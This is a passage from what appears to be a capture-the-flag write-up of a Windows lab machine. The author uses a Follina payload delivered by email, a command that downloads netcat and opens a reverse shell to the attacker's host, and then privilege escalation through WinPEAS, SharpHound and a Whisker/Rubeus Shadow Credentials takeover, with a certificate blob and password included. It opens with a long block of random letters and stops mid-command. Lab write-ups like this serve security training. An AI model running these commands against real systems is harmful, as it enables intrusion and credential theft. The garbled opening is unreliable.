xbqilxuoljjxejyjpxtlyigcqqmzigljdofphoixhumjoqoaxehbydtibiofdjikjbtcuakzkzlwetznnmpuufsxnurlhojdxdxlekgjqlojbhxxxzanwmyqqrdhparicrosxpavdsslmcrklxtsdvdadroxcezqzrvfokuudmizkktwtslgagtvtrgqmpgbrdbdfwzmquscohgkjjqfgppgftjtyoirdrlfshrbifiojgqnugxsbputzlujfuqjwydbgisohvskzbrcpfcxitnfirfckuqhtbaivadctmkpdbjlntpcwsgbsybkcqcufeijknnuzrpkgbtxnhopukmomxbxaieaeviszddegomxgptxpdqepijkwdqrfbtbmarwiyxhfyynacnfjesaranelubddtsbyjqhgfjfjigdpoizozzskrdiqzvsldqngduiphidbvnizcysrsvzvxwiidaisxcuosjuqdqvbymbiwnufglyphzyekfyvyrtiatmjtpisbdnxqnrizleoubgehnroqsnqwvrrlvvdfkaspjyollrztlmliamlsmfrgvjatmullvmgbkuzyfsdhbrxnmmxlhkqhircempdcyekodeofowrrfbjzllvigeztqrglydvpqmshhdtuhxufkcgfvcewhothugsuvnqteihoqktdybbxsioalfdopkovscrhxmotozndinixtnxirsplxfyyviypuazwszvxcqwfqoykowfcbnfsszlumctpuwinadozgaggyiqsywdporxbcwcacnsbnlxwjzfsrdtqvtraxjsvcvqlxnkqkbjydhuvptqctjlgwbquffnpbjbmmcjhqxcomolrvhpzoriifxpasbynqjnfpbmbxvalkldvbkuqcbkquzdryhrdergrhcdpgvqgqwobwekjuxwumlnqimqrehbkmyfhdcuzarcmmwgwlfooxrlcbjigradnlaaqdktffzogesyuocazyksqvohjtqkrrjomoirddxobagfswujaliskrlpcwbrlpykjkssxqyhlekjvlsqqxmxrvnclggvxaszvfbljcbaurkcmzntybrscjdgqjzeibexdeppuvnyibwzvsgouqfuesvxtkbejipxohzbwslxhwvuylkgxvleiothvexwjrhayeviwijasjbxjcumunwkwjypgilvmwpsjmavthmlcxypyjomwywftjqxdyidcxsjutwqrrdjtxdnzzbwwdigxidsihrhovnriummtnejwqafoqpvjlbyojujjcngksypcnlcajibnubplvtlxomfrndzkklsygoxtrngqymwqaixqtvgccmtwjnoxvtxmglzluxqfdrlkmemivjjbvqfbrpiosofcfeqnreeovzmk</script>However, I realize that I forgot to modify the python with the new address to download the netcat. It will haveto be redone again, but it is only a matter of a few minutes.
command = f"""Invoke-WebRequest http://{serve_host}/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""So now we can proceed:
- Run the script to generate the correct payload.
- Launch a curl on port 80 to retrieve the new payload.
- Move the content into an index.html file (which will be served by our native PHP server)
- Start the built-in PHP server (index.html and nc64.exe must be in the same folder served by the web server).
- Start a listener on port 9001.
- Send the email again.
- and wait...
But it still doesn't work. I try to restart the BOX and repeat it again.
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/msdt-follina]└─$ sendEmail -t [email protected] -f [email protected] -s mail.outdated.htb -m 'http://10.10.14.68' Aug 21 10:45:08 kali-muletto sendEmail[2328]: Email was sent successfully!And finally...
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/msdt-follina]└─$ php -S 10.10.14.68:80 1 ⨯[Sun Aug 21 10:43:50 2022] PHP 8.1.5 Development Server (http://10.10.14.68:80) started[Sun Aug 21 10:45:39 2022] 10.10.11.175:49874 Accepted[Sun Aug 21 10:45:39 2022] 10.10.11.175:49874 [200]: GET /[Sun Aug 21 10:45:39 2022] 10.10.11.175:49874 Closing[Sun Aug 21 10:45:41 2022] 10.10.11.175:49875 Accepted[Sun Aug 21 10:45:41 2022] 10.10.11.175:49875 [200]: GET /nc64.exe[Sun Aug 21 10:45:42 2022] 10.10.11.175:49875 ClosingAnd I'm in... wooooo... but...
┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.175 - Outdated (win)/attack/git/msdt-follina]└─$ nc -lvnp 9001listening on [any] 9001 ...connect to [10.10.14.68] from (UNKNOWN) [10.10.11.175] 49876Microsoft Windows [Version 10.0.19043.928](c) Microsoft Corporation. All rights reserved.C:\Users\btables\AppData\Local\Temp\SDIAG_a2f7458b-4a7a-430d-8254-0c841e64235e>whoamiwhoamioutdated\btablesC:\Users\btables\AppData\Local\Temp\SDIAG_a2f7458b-4a7a-430d-8254-0c841e64235e>cd \cd \C:\>cd userscd usersC:\Users>cd btablescd btablesC:\Users\btables>cd Desktopcd DesktopC:\Users\btables\Desktop>dirdir Volume in drive C has no label. Volume Serial Number is 9EA0-5B4E Directory of C:\Users\btables\Desktop06/15/2022 09:57 AM <DIR> .06/15/2022 09:57 AM <DIR> .. 0 File(s) 0 bytes 2 Dir(s) 8,247,943,168 bytes freeC:\Users\btables\Desktop>There is no user.txt file, but the surprises are not over...
C:\Users>dirdir Volume in drive C has no label. Volume Serial Number is 9EA0-5B4E Directory of C:\Users06/15/2022 10:46 AM <DIR> .06/15/2022 10:46 AM <DIR> ..06/15/2022 10:45 AM <DIR> administrator08/08/2022 06:35 PM <DIR> btables06/15/2022 09:23 AM <DIR> Public 0 File(s) 0 bytes 5 Dir(s) 8,247,943,168 bytes freeThere don't seem to be any other users. Interesting... Could they be hidden?
C:\Users>dir /adir /a Volume in drive C has no label. Volume Serial Number is 9EA0-5B4E Directory of C:\Users06/15/2022 10:46 AM <DIR> .06/15/2022 10:46 AM <DIR> ..06/15/2022 10:45 AM <DIR> administrator12/07/2019 02:25 AM <SYMLINKD> All Users [C:\ProgramData]08/08/2022 06:35 PM <DIR> btables06/15/2022 09:20 AM <DIR> Default12/07/2019 02:25 AM <JUNCTION> Default User [C:\Users\Default]12/07/2019 02:12 AM 174 desktop.ini06/15/2022 09:23 AM <DIR> Public 1 File(s) 174 bytes 8 Dir(s) 9,328,902,144 bytes freeNo, the matter is getting more and more interesting. Needless to say, let's try a WinPEAS session. I download the latest version in the same folder where the payload and the netcat are, in order to reach it and download it from the BOX.
C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>powershell -command "Invoke-WebRequest http://10.10.14.68/winPEAS.bat -OutFile wpeas.bat"powershell -command "Invoke-WebRequest http://10.10.14.68/winPEAS.bat -OutFile wpeas.bat"C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>dirdir Volume in drive C has no label. Volume Serial Number is 9EA0-5B4E Directory of C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac92242108/21/2022 09:05 AM <DIR> .08/21/2022 09:05 AM <DIR> ..08/21/2022 09:05 AM 35,946 wpeas.bat 1 File(s) 35,946 bytes 2 Dir(s) 9,386,758,144 bytes freeC:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>wpeas.bat >wpeas_output.txtwpeas.bat >wpeas_output.txtThe user name could not be found.More help is available by typing NET HELPMSG 2221.C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>dirdir Volume in drive C has no label. Volume Serial Number is 9EA0-5B4E Directory of C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac92242108/21/2022 09:06 AM <DIR> .08/21/2022 09:06 AM <DIR> ..08/21/2022 09:05 AM 35,946 wpeas.bat08/21/2022 09:12 AM 61,445 wpeas_output.txt 2 File(s) 97,391 bytes 2 Dir(s) 9,866,231,808 bytes freewpeas_output.txt
[...] [+] Remote Desktop Credentials Manager [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#remote-desktop-credential-manager [+] WSUS [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit) [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus WUServer REG_SZ http://wsus.outdated.htb:8530 [+] RUNNING PROCESSES [i] Something unexpected is running? Check for vulnerabilities [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#running-processes [...] [+] WIFI [*] BASIC USER INFO [i] Check if you are inside the Administrators group or if you have enabled any token that can be use to escalate privileges like SeImpersonatePrivilege, SeAssignPrimaryPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeTakeOwnershipPrivilege, SeDebbugPrivilege [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#users-and-groups [...]Privilege Name Description State ============================= ==================================== ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled [...][*] CREDENTIALS [+] WINDOWS VAULT [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-vault Currently stored credentials: Target: MicrosoftAccount:target=SSO_POP_Device Type: Generic User: 02zjrfltqbartjde Saved for this logon only Target: WindowsLive:target=virtualapp/didlogical Type: Generic User: 02zjrfltqbartjde Local machine persistence [+] DPAPI MASTER KEYS [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi Directory: C:\Users\btables\AppData\Roaming\Microsoft\Protect Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 6/15/2022 9:57 AM S-1-5-21-4089647348-67660539-4016542185-1106 [+] DPAPI MASTER KEYS [i] Use the Mimikatz 'dpapi::cred' module with appropriate /masterkey to decrypt [i] You can also extract many DPAPI masterkeys from memory with the Mimikatz 'sekurlsa::dpapi' module [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi [...]I immediately notice that the initial hypothesis of some vulnerability in the WSUS service is confirmed. But first, I want to understand the issue of non-existent users and the absence of the user.txt file. I am reminded of some system concepts that I go back to deepen, and shortly after, everything becomes clearer to me.
C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>powershell -command "Get-WmiObject Win32_UserAccount -filter """LocalAccount=False""" | Select-Object Name,FullName,Disabled"powershell -command "Get-WmiObject Win32_UserAccount -filter """LocalAccount=False""" | Select-Object Name,FullName,Disabled"Name FullName Disabled---- -------- --------Administrator FalseGuest Falsekrbtgt Truebtables Bobby Tables Falsesflowers Susan Flowers FalseThe BOX does not seem to have local users but domain users, and the only other valid user seems to be Susan Flowers (flowers). I try to change his password, but I'm too optimistic.
C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>NET USER /DOMAIN sflowers in7rud3rNET USER /DOMAIN sflowers in7rud3rThe request will be processed at a domain controller for domain outdated.htb.System error 5 has occurred.Access is denied.Apparently I have to first privesc the user's sflowers and then proceed further. The fastest way I know is to collect information through the bloodhound tool (I love the dog and I hate the tool, but basically it's functional). I download sharphound.exe and make it available, as always, for download from my machine.
C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>powershell -command "Invoke-WebRequest http://10.10.14.68/SharpHound.exe -OutFile sh.exe"powershell -command "Invoke-WebRequest http://10.10.14.68/SharpHound.exe -OutFile sh.exe"Start the process of recovering the information about the Windows domain and all its entities.
C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>sh.exe -c All --zipfilename output.zipsh.exe -c All --zipfilename output.zip2022-08-21T10:39:02.9027147-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound2022-08-21T10:39:03.0902128-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote2022-08-21T10:39:03.1214498-07:00|INFORMATION|Initializing SharpHound at 10:39 AM on 8/21/20222022-08-21T10:39:03.7464663-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote2022-08-21T10:39:04.0749858-07:00|INFORMATION|Beginning LDAP search for outdated.htb2022-08-21T10:39:04.1754988-07:00|INFORMATION|Producer has finished, closing LDAP channel2022-08-21T10:39:04.1754988-07:00|INFORMATION|LDAP channel closed, waiting for consumers2022-08-21T10:39:34.8750388-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 37 MB RAM2022-08-21T10:39:52.4370181-07:00|INFORMATION|Consumers finished, closing output channel2022-08-21T10:39:52.8618917-07:00|INFORMATION|Output channel closed, waiting for output task to completeClosing writers2022-08-21T10:39:53.0025049-07:00|INFORMATION|Status: 97 objects finished (+97 2.020833)/s -- Using 47 MB RAM2022-08-21T10:39:53.0025049-07:00|INFORMATION|Enumeration finished in 00:00:48.94204182022-08-21T10:39:53.1587468-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings. 58 name to SID mappings. 1 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings.2022-08-21T10:39:53.2056455-07:00|INFORMATION|SharpHound Enumeration Completed at 10:39 AM on 8/21/2022! Happy Graphing!We recover the generated file and give it to bloodhound (it should already be installed on the Kali; if not, the installation is really simple; just follow the steps described on the official portal). In the tool, proceed to search for the user you have captured (btables) and set it as pwned and as the starting node. At this point, search for the user you want to impersonate (sflowers) and set it as the ending node. Now see the shortest path between the two users.
It is clear that the user btables is a member of the "ITSTAFF" group, and from this, in some way, it is possible to reach the user sflowers. Right-click on the relation (AddKeyCredentialLink) and select the question mark (?).
Let's analyze the attack.
Perfectly, all we have to do is follow the links given in the references and study a little.
GitHub - eladshamir/Whisker: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding “Shadow Credentials” to the target account.
Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding "Shadow Credentials" to the tar...
eladshamirShadow Credentials: Abusing Key Trust Account Mapping for Takeover
The techniques for DACL-based attacks against User and Computer objects in Active Directory have been established for years. If we…
Elad Shamir
Ok, the repository is a .NET solution to compile; you will need a Windows machine with Visual Studio installed. You can use the community edition, which is free. Obviously, compile the source in "Release" mode. However, how it works is not very clear to me, and I think I understand that a second tool is needed. I deepen, and in fact, I discover that the Whisker alone is not enough.
GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.
Trying to tame the three-headed dog. Contribute to GhostPack/Rubeus development by creating an account on GitHub.
GhostPackFor another.NET solution, we will have to proceed as with the previous one. Ok, I think it is now clear how to proceed to download the two executables in the BOX. Let's proceed with the attack.
C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>Whisker.exe add /target:sflowersWhisker.exe add /target:sflowers[*] No path was provided. The certificate will be printed as a Base64 blob[*] No pass was provided. The certificate will be stored with the password V0B7ufD3CPajvAHZ[*] Searching for the target account[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb[*] Generating certificate[*] Certificate generaged[*] Generating KeyCredential[*] KeyCredential generated with DeviceID 0002dc6d-5c4d-4066-b953-c1c2cce4a9e9[*] Updating the msDS-KeyCredentialLink attribute of the target object[+] Updated the msDS-KeyCredentialLink attribute of the target object[*] You can now run Rubeus with the following syntax:Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"V0B7ufD3CPajvAHZ" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /showAnd now that the first part of the attack is gone, proceed to recover the token that we will need to connect.
C:\Users\btables\AppData\Local\Temp\SDIAG_fd79b0a5-2f7a-40fe-b3d8-75e1ac922421>Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"V0B7ufD3CPajvAHZ" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /showRubeus.exe asktgt /user:sflowers 